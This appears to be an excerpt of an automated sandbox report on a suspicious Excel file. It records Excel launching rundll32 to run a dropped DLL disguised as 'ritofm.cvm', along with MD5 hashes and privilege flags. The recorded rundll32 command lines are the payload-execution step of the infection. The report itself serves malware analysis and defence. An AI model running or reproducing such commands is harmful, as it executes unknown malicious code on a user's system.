                                                                                                                                                                                                  Start time:16:56:23
                                                                                                                                                                                                  Start date:12/05/2021
                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                                                                  Imagebase:0x390000
                                                                                                                                                                                                  File size:27110184 bytes
                                                                                                                                                                                                  MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Start time:16:56:32
                                                                                                                                                                                                  Start date:12/05/2021
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:rundll32 ..\ritofm.cvm,DllRegisterServer
                                                                                                                                                                                                  Imagebase:0x1000000
                                                                                                                                                                                                  File size:61952 bytes
                                                                                                                                                                                                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Start time:16:56:32
                                                                                                                                                                                                  Start date:12/05/2021
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:rundll32 ..\ritofm.cvm1,DllRegisterServer
                                                                                                                                                                                                  Imagebase:0x1000000
                                                                                                                                                                                                  File size:61952 bytes
                                                                                                                                                                                                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                  Disassembly

                                                                                                                                                                                                  Code Analysis

                                                                                                                                                                                                  Reset < >